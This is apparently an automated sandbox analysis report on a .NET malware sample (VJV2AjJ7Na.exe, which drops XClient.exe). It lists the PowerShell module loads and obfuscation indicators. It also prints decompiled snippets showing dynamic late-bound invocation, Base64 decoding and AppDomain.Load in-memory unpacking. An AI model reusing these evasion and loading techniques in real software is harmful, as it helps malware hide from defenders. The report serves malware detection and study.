                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: XClient.lnk.0.drLNK file: ..\..\..\..\..\XClient.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: VJV2AjJ7Na.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: VJV2AjJ7Na.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          barindex
                          .NET source code contains method to dynamically call methods (often used by packers)
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{jKUhhyNoAJUFWqyteGPWRmgpLpp.JWxWVRR8m4ncuMVk64eui5s8Ll2,jKUhhyNoAJUFWqyteGPWRmgpLpp._2YdhfA909rflCAePy1icb5XzLkz,jKUhhyNoAJUFWqyteGPWRmgpLpp.yNzZZeBmK9g29TQ3D21L5zMXRbj,jKUhhyNoAJUFWqyteGPWRmgpLpp.wam9XgvPkIMos3noQq1MScny9SX,llVL2VVPJ9sap5xkkujGTYTBVxb.Giwvr1HIqR3x7dbExfXg9vpjB2XFPhMaTcmzjbin3QAXmB8OdbBM5QUNYsGv()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{gbFCU5IOSxPP7T70NiIafF5Xqmc[2],llVL2VVPJ9sap5xkkujGTYTBVxb._52qDsxtYeZYyeylsTZdEq8wXJ41kEaynG9hXm6oULPxWU0C2LbL0zJCQ9d1c(Convert.FromBase64String(gbFCU5IOSxPP7T70NiIafF5Xqmc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{jKUhhyNoAJUFWqyteGPWRmgpLpp.JWxWVRR8m4ncuMVk64eui5s8Ll2,jKUhhyNoAJUFWqyteGPWRmgpLpp._2YdhfA909rflCAePy1icb5XzLkz,jKUhhyNoAJUFWqyteGPWRmgpLpp.yNzZZeBmK9g29TQ3D21L5zMXRbj,jKUhhyNoAJUFWqyteGPWRmgpLpp.wam9XgvPkIMos3noQq1MScny9SX,llVL2VVPJ9sap5xkkujGTYTBVxb.Giwvr1HIqR3x7dbExfXg9vpjB2XFPhMaTcmzjbin3QAXmB8OdbBM5QUNYsGv()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{gbFCU5IOSxPP7T70NiIafF5Xqmc[2],llVL2VVPJ9sap5xkkujGTYTBVxb._52qDsxtYeZYyeylsTZdEq8wXJ41kEaynG9hXm6oULPxWU0C2LbL0zJCQ9d1c(Convert.FromBase64String(gbFCU5IOSxPP7T70NiIafF5Xqmc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          .NET source code contains potential unpacker
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: CtarBZ1HEXsD94arDPmFsMJ2orj System.AppDomain.Load(byte[])
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK System.AppDomain.Load(byte[])
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: CtarBZ1HEXsD94arDPmFsMJ2orj System.AppDomain.Load(byte[])
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK System.AppDomain.Load(byte[])
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD3469792B push ebx; retf 0_2_00007FFD3469796A
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeCode function: 0_2_00007FFD346986F2 pushad ; ret 0_2_00007FFD34698719
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3457D2A5 pushad ; iretd 2_2_00007FFD3457D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34762316 push 8B485F91h; iretd 2_2_00007FFD3476231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3457D2A5 pushad ; iretd 5_2_00007FFD3457D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34762316 push 8B485F91h; iretd 5_2_00007FFD3476231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD3456D2A5 pushad ; iretd 8_2_00007FFD3456D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34752316 push 8B485F92h; iretd 8_2_00007FFD3475231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3454D2A5 pushad ; iretd 10_2_00007FFD3454D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD346620C2 push ebx; retf 10_2_00007FFD346620C3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34732316 push 8B485F94h; iretd 10_2_00007FFD3473231B
                          Source: VJV2AjJ7Na.exe, jKUhhyNoAJUFWqyteGPWRmgpLpp.csHigh entropy of concatenated method names: 'mfVbCuCNZasZDZreMS904bwKapj9Vz2wfKNogpljqsPuv', 'Gg4zNv53TuNwvAQCIqfJWzonXQp4mWWHj7Ie6npEYQChM', 'v4alJqUW46v4wWSnmFm5iw99rbSSbDY2u3NQZ4orbOEph', 'Ll0SRvYpMaesFYYzUHrqKl5Lw3kyY1t04eBy8pByMIqr0'
                          Source: VJV2AjJ7Na.exe, YsN02iaBQuXyZWv7DixuCPmBXWwN2ds2fU0kL0FSjgeViMXx0QEgCCgNVPpd.csHigh entropy of concatenated method names: 'fEqXIn2R713lg1Afq1Ekp3dWoyp0kRM2rKomPnusXouXc3sgyz5XHWRzMztY', 'JlmxmxDnMNmNrfO60n9by9fRLJ2WYBoZwN8GWn8Gpjnci5GzZbD0QY3HLwFv', 'LWiita0dCeFnEUC6wV5bnsT8AiicWr5DglOtCVUwGiqgkexvNVVdervr2w9k', 'ulzyQeELsJZZweTsDIogXVubfi6SdA5SrlKPheIFXDA9oHrJr3YSCHNLOPTQqr', 'nNv4XK3RO20t5nlvvxJ0ogLM4ObUkWtDAHHtsGUCVOUCSD9PJXa3Y7xlSjqerx', 'CQ0Fv18LqIiCwbfcuuC1gbyTOcthOB8Ng5LOTkneXQ5H8qdvGvHeJkIqsnkkf6', 'lOhno887cCEryUJqA9jjJlNa5KylvsVr10YjmerhyWsgV5adrGSYqlRUmGUgIi', 'XhXTCUyuDtworTrGxsbeYmxryjo7ObRbK8wtCbUFH1tZ6r1sTjn0jE4rlU1lMZ', 'ICXsKgKUmIjya0PNKEcNfP9MZeUNMmUFJBVvmR38W4ZaTORR4zmkIs584nhhxS', 'm12R9Fdt9ltHQadKFGw8XVloAljN26OVgjPH90ge7zyk2ICj8roq6sGsdFIXaM'
                          Source: VJV2AjJ7Na.exe, cChbrHmQNgN8mmZ98E8AsEPgqWN.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ugd2JoN2SW0mzJpuZN82ym08KpWhJdNAWB8BuWpOF4VyM', 'FstFJYjQL0oMfaiRskqfb6PrYdtuWSGdfQ91zQPcTIIM9', 'jL7nI81K42U0X1bOw85qKlMjaDKeP3Fb8Vt5w23JaCMLD', '_7i83NGQwecXMg9NTHQDJAIwsnzXzYC5Kg1R6WtBjYXK5P'
                          Source: VJV2AjJ7Na.exe, wZBvGNYQHp0pdqeFieqC06ydodU.csHigh entropy of concatenated method names: 'tCBmqjcy2cHzHnjZFROdkXE2wyK', 'ZXJ0AecGWeMzAEhmlMZu4lUssqH3NzXwqk8Y4j4lnCptWwnwNlj1czdmFwdEfwBvgo2xfmVCaDjCU', 'bsInprFMhSDLMSX9ivxZ1zg4dQ5gg9zeADq9tGAzNqaO1c6o5fHvE7at9OIQ6W9ExoMIbGx31wwlo', 'wwXPyXW5TeS2Hc2kMBNQXHWntIFvwTrNhXFL1thorQNzORRTZxrUhUbgSUibfhKoJteY6Fsc9KtVI', 'ZcLc4Ki3E7pEYuJOJChVNUnH9n5BeKUIq1vj9hqWIxFCBp8aGAH8RDM8HIcdSYgtl5cXGrCzK1p8p'
                          Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.csHigh entropy of concatenated method names: '_8ffFuLAP75dy548usQ1aRiqx5OW', '_4GnA0cF4BV7GlyIj0JtZPfEcSAgnnauVi6iYzLjh1ziSrO62HICqNh5R6cdt', 'qUv0pY6VdW8dZFUPt74rgLPE6bheXtukzl6yiwQu3Fkar1VfCVnuVkEX1E5j', 'ItSLhdEABg05yHgsrQoKr9dwIVhOl8lEtgF8vx1ExkIDtmW0OUrMRcZag3Ry', 'MCbxpVuWUvFHe7sPlmfooMMv66ODY4hXRnJcJzE6QjmTL5nejJu1Hf0sQ6WM', 'ffmwVu1WQulWtwJ8hyhh2oSBl9BoIdVGJdu900hqwe8MsafLyerjcoG5pKjM', 'f72jZflUUmXGdIrjmnMiFzoBB2JCVBioqCw5mbXvMgvAFjJc6sPtyJNpqnIS', 'FwfmNNLpwxrtyDYrczsFNSNyFAvIwyObeOfwtgOw43lrvu6oe7eMtqY4OrBe', '_9IyUqdTWFzVFMAIECUR4YKQVek1Izfq9VAl690Hv4ADB9D6pEPfRZmuOf32i', 'mXoIaeQrZXjGACI0FgKy1iSgdsXZRImXboKoRBFBQHilbysaXiXsf87DkS5G'
                          Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.csHigh entropy of concatenated method names: 'NxkZ125FEx4VSbCg6W1tSpcD66I', 'PfTpXwlolEcNaBr5q3bOdL6uRwt', 'GdRfZNeG1rkSQtfhUx4OPqKbiy0', '_6grvP178v6VX2ZaeBrxBJSscPNJ', 'nSXf6OgfPRFyOahpbGiLFmIqbIc', 'XpyEUgqAAItsoNqKpGb4ouj6zsX', 'tFDfIKNEw9vCpvMAZuiKNMSJ2Sv', 'POryrb6uuBay5N24gr2yY3qRnlz', '_8cVwh2kWqSfjX7O2a8CGPFIQnJm', 'AjcNg5JigSdlbMKtBR9BfMlii1S'
                          Source: VJV2AjJ7Na.exe, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csHigh entropy of concatenated method names: '_15VqBWiP8ajSmID7Z1W1s3cUFLn', 'WKYYvblLQN7X5ctNyyp5CURHByT3ig4PR0FwtJdQV1b5crUTObNCR4hBzA2JOEDWYZkiaYnF2EWqG', 'TtRsHFUZB7vkwGLS3ZHafT9462jlra6261CNMNsKKKVuTba0mfCvMzxZ10c8gsDHfbZbwBaVp4AoT', 'RfQymNp614usOTqSD4cUHZt1FAQUYHH4rdE6J2Crk8713oJ6ZwUSNkYWNAb8defLoGfxolpeU2JYH', 'VuRPwX7ivpDyuouYlLqKTsn1g3VNnwoMrbuHQUt6hvyAIdy0Rzp76EI6sEpiS7XacBH3kaulmUlXP'
                          Source: VJV2AjJ7Na.exe, RCjJ5B4jrOCNfAAF4mpf3KELCkk.csHigh entropy of concatenated method names: '_44MZSahGCfIhUdoSyQcFpnYgVsN', 'gO8MF2dyOzaAKN5DISH7MUm6rEr', 'warL5RjU94opEnffdkBYcgq8XGc', 'NEM0emru1GgKovmO25FzKievS1w', '_0F2ciGPIKyVtCd9PESe2HHFnmB7Kb35wSwR2GAsfJbZBc8J4zSK1l9HkzpcB4nTgN4dPq1hSRVqu6', 'aLQu6ILsnDIp2pnZcuXN8l9UkCAUJocrrR15DD6AYKQ3AHCyNprSincLs90P5zfGS5PCVPCYVlE78', '_4zdUiX3cLkOUiiyitascLwgjps4GlTzLhvoQaRJz7HN3iKAMygzqdKuQOsHZ0ZIhrbFGWWAzlVGMQ', 'YOsEoR216joa1YZ6Ak0OOuDeFRiQ2uQjpdZW04cwKlDZuJSfs9RkbgMzIFn4DqynySNVs1ceN2Pn0', 'rJxxwgUMGkUwoY4cqnIx2EqS4HAwVjPfs5Az76ENWcerNH2HVsjPnscyKpiIfDcxGVWRrpVebmivc', 'qYn1GciZGb8rzDAfM2YoAD4yg8IHVxWE2ZSc4Z62RFAp8ESGnPAFN8yqcfVOt2pkRjBqN3EZlJv5K'
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.csHigh entropy of concatenated method names: 'SktjeVQAgq2NUDDhVGQLtffzk7Y', 'CtarBZ1HEXsD94arDPmFsMJ2orj', 'Jcs0stg3beBOtmFfDweOixjz9og', 'R0jFEKXc0magkb27YqxkUPKU4Tl', '_6NXIBwQD7F8nGERUT3TACGB3lOD', 'M8zkVJKItRSoCrcC7cIdzcCNBy9', 'UWTjleB9asvuSQV44RqFkYDJIOj', 'LrphE5fJecFnffhZSGLqABZTJgQ', 'PpsBogNTjabWDCkxX8RGKVEjksp', 'LPmctabsUUhrVXgioj4pZW3enZ9'
                          Source: VJV2AjJ7Na.exe, yg3VA3EFGZdbEMP0sB36o1rvwRb.csHigh entropy of concatenated method names: 'gRdj1vqOUhgpWhn8BStbuJZneww', 'nX35JTmmmDVkBUsZxHNuODxCpf0', 'X43RfMLXrrlVaETBhVNV824YuFp', 'u6L0fr0Yy3pOb1FCBzYomsvDG2X', 'C5RNlXWueLOy7wranJk75UDuXu2', 'KLeSBwFKMdsnmu6yzVHTtNc1dgA', 'YECDjSEvimvIyZ7yaWZIZK0mQnY', 'U4Y4IwVQS1gwVdtQKDGdQIKBlw0', 'YY7p4sCKKtzfVpLfTohfNjEBMM8', 'magkWLfQqTUoel7aG6sciHcBQ51'
                          Source: XClient.exe.0.dr, jKUhhyNoAJUFWqyteGPWRmgpLpp.csHigh entropy of concatenated method names: 'mfVbCuCNZasZDZreMS904bwKapj9Vz2wfKNogpljqsPuv', 'Gg4zNv53TuNwvAQCIqfJWzonXQp4mWWHj7Ie6npEYQChM', 'v4alJqUW46v4wWSnmFm5iw99rbSSbDY2u3NQZ4orbOEph', 'Ll0SRvYpMaesFYYzUHrqKl5Lw3kyY1t04eBy8pByMIqr0'
                          Source: XClient.exe.0.dr, YsN02iaBQuXyZWv7DixuCPmBXWwN2ds2fU0kL0FSjgeViMXx0QEgCCgNVPpd.csHigh entropy of concatenated method names: 'fEqXIn2R713lg1Afq1Ekp3dWoyp0kRM2rKomPnusXouXc3sgyz5XHWRzMztY', 'JlmxmxDnMNmNrfO60n9by9fRLJ2WYBoZwN8GWn8Gpjnci5GzZbD0QY3HLwFv', 'LWiita0dCeFnEUC6wV5bnsT8AiicWr5DglOtCVUwGiqgkexvNVVdervr2w9k', 'ulzyQeELsJZZweTsDIogXVubfi6SdA5SrlKPheIFXDA9oHrJr3YSCHNLOPTQqr', 'nNv4XK3RO20t5nlvvxJ0ogLM4ObUkWtDAHHtsGUCVOUCSD9PJXa3Y7xlSjqerx', 'CQ0Fv18LqIiCwbfcuuC1gbyTOcthOB8Ng5LOTkneXQ5H8qdvGvHeJkIqsnkkf6', 'lOhno887cCEryUJqA9jjJlNa5KylvsVr10YjmerhyWsgV5adrGSYqlRUmGUgIi', 'XhXTCUyuDtworTrGxsbeYmxryjo7ObRbK8wtCbUFH1tZ6r1sTjn0jE4rlU1lMZ', 'ICXsKgKUmIjya0PNKEcNfP9MZeUNMmUFJBVvmR38W4ZaTORR4zmkIs584nhhxS', 'm12R9Fdt9ltHQadKFGw8XVloAljN26OVgjPH90ge7zyk2ICj8roq6sGsdFIXaM'
                          Source: XClient.exe.0.dr, cChbrHmQNgN8mmZ98E8AsEPgqWN.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ugd2JoN2SW0mzJpuZN82ym08KpWhJdNAWB8BuWpOF4VyM', 'FstFJYjQL0oMfaiRskqfb6PrYdtuWSGdfQ91zQPcTIIM9', 'jL7nI81K42U0X1bOw85qKlMjaDKeP3Fb8Vt5w23JaCMLD', '_7i83NGQwecXMg9NTHQDJAIwsnzXzYC5Kg1R6WtBjYXK5P'
                          Source: XClient.exe.0.dr, wZBvGNYQHp0pdqeFieqC06ydodU.csHigh entropy of concatenated method names: 'tCBmqjcy2cHzHnjZFROdkXE2wyK', 'ZXJ0AecGWeMzAEhmlMZu4lUssqH3NzXwqk8Y4j4lnCptWwnwNlj1czdmFwdEfwBvgo2xfmVCaDjCU', 'bsInprFMhSDLMSX9ivxZ1zg4dQ5gg9zeADq9tGAzNqaO1c6o5fHvE7at9OIQ6W9ExoMIbGx31wwlo', 'wwXPyXW5TeS2Hc2kMBNQXHWntIFvwTrNhXFL1thorQNzORRTZxrUhUbgSUibfhKoJteY6Fsc9KtVI', 'ZcLc4Ki3E7pEYuJOJChVNUnH9n5BeKUIq1vj9hqWIxFCBp8aGAH8RDM8HIcdSYgtl5cXGrCzK1p8p'
                          Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.csHigh entropy of concatenated method names: '_8ffFuLAP75dy548usQ1aRiqx5OW', '_4GnA0cF4BV7GlyIj0JtZPfEcSAgnnauVi6iYzLjh1ziSrO62HICqNh5R6cdt', 'qUv0pY6VdW8dZFUPt74rgLPE6bheXtukzl6yiwQu3Fkar1VfCVnuVkEX1E5j', 'ItSLhdEABg05yHgsrQoKr9dwIVhOl8lEtgF8vx1ExkIDtmW0OUrMRcZag3Ry', 'MCbxpVuWUvFHe7sPlmfooMMv66ODY4hXRnJcJzE6QjmTL5nejJu1Hf0sQ6WM', 'ffmwVu1WQulWtwJ8hyhh2oSBl9BoIdVGJdu900hqwe8MsafLyerjcoG5pKjM', 'f72jZflUUmXGdIrjmnMiFzoBB2JCVBioqCw5mbXvMgvAFjJc6sPtyJNpqnIS', 'FwfmNNLpwxrtyDYrczsFNSNyFAvIwyObeOfwtgOw43lrvu6oe7eMtqY4OrBe', '_9IyUqdTWFzVFMAIECUR4YKQVek1Izfq9VAl690Hv4ADB9D6pEPfRZmuOf32i', 'mXoIaeQrZXjGACI0FgKy1iSgdsXZRImXboKoRBFBQHilbysaXiXsf87DkS5G'
                          Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.csHigh entropy of concatenated method names: 'NxkZ125FEx4VSbCg6W1tSpcD66I', 'PfTpXwlolEcNaBr5q3bOdL6uRwt', 'GdRfZNeG1rkSQtfhUx4OPqKbiy0', '_6grvP178v6VX2ZaeBrxBJSscPNJ', 'nSXf6OgfPRFyOahpbGiLFmIqbIc', 'XpyEUgqAAItsoNqKpGb4ouj6zsX', 'tFDfIKNEw9vCpvMAZuiKNMSJ2Sv', 'POryrb6uuBay5N24gr2yY3qRnlz', '_8cVwh2kWqSfjX7O2a8CGPFIQnJm', 'AjcNg5JigSdlbMKtBR9BfMlii1S'
                          Source: XClient.exe.0.dr, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.csHigh entropy of concatenated method names: '_15VqBWiP8ajSmID7Z1W1s3cUFLn', 'WKYYvblLQN7X5ctNyyp5CURHByT3ig4PR0FwtJdQV1b5crUTObNCR4hBzA2JOEDWYZkiaYnF2EWqG', 'TtRsHFUZB7vkwGLS3ZHafT9462jlra6261CNMNsKKKVuTba0mfCvMzxZ10c8gsDHfbZbwBaVp4AoT', 'RfQymNp614usOTqSD4cUHZt1FAQUYHH4rdE6J2Crk8713oJ6ZwUSNkYWNAb8defLoGfxolpeU2JYH', 'VuRPwX7ivpDyuouYlLqKTsn1g3VNnwoMrbuHQUt6hvyAIdy0Rzp76EI6sEpiS7XacBH3kaulmUlXP'
                          Source: XClient.exe.0.dr, RCjJ5B4jrOCNfAAF4mpf3KELCkk.csHigh entropy of concatenated method names: '_44MZSahGCfIhUdoSyQcFpnYgVsN', 'gO8MF2dyOzaAKN5DISH7MUm6rEr', 'warL5RjU94opEnffdkBYcgq8XGc', 'NEM0emru1GgKovmO25FzKievS1w', '_0F2ciGPIKyVtCd9PESe2HHFnmB7Kb35wSwR2GAsfJbZBc8J4zSK1l9HkzpcB4nTgN4dPq1hSRVqu6', 'aLQu6ILsnDIp2pnZcuXN8l9UkCAUJocrrR15DD6AYKQ3AHCyNprSincLs90P5zfGS5PCVPCYVlE78', '_4zdUiX3cLkOUiiyitascLwgjps4GlTzLhvoQaRJz7HN3iKAMygzqdKuQOsHZ0ZIhrbFGWWAzlVGMQ', 'YOsEoR216joa1YZ6Ak0OOuDeFRiQ2uQjpdZW04cwKlDZuJSfs9RkbgMzIFn4DqynySNVs1ceN2Pn0', 'rJxxwgUMGkUwoY4cqnIx2EqS4HAwVjPfs5Az76ENWcerNH2HVsjPnscyKpiIfDcxGVWRrpVebmivc', 'qYn1GciZGb8rzDAfM2YoAD4yg8IHVxWE2ZSc4Z62RFAp8ESGnPAFN8yqcfVOt2pkRjBqN3EZlJv5K'
